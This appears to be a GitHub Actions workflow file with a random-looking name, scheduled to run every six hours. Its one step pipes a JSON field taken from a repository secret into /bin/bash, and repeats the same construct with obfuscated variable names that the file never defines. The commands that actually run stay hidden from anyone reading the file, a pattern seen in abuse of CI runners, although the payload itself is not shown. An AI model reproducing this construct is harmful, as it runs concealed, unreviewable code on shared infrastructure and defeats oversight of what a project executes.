name: chenqinian3490
on:
  workflow_dispatch:
  schedule:
    - cron: '6 2/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: chenqinian3490
        env:
          w58148: ${{ secrets.w58148 }}
        run: |
          echo $w58148 | jq -r .yqov71 | /bin/bash
          echo $cwxa6216 | jq -r .xit916 | /bin/bash
          echo $op4447 | jq -r .jry15 | /bin/bash
          echo $g1 | jq -r .blud6 | /bin/bash
          echo $xqeth5 | jq -r .o80185 | /bin/bash
          echo $dksd794 | jq -r .fl2154 | /bin/bash
          echo $xgsf8 | jq -r .zdggk7524 | /bin/bash
          echo $ckfy322 | jq -r .nrcrq684 | /bin/bash
          echo $vly19261 | jq -r .ui00438 | /bin/bash

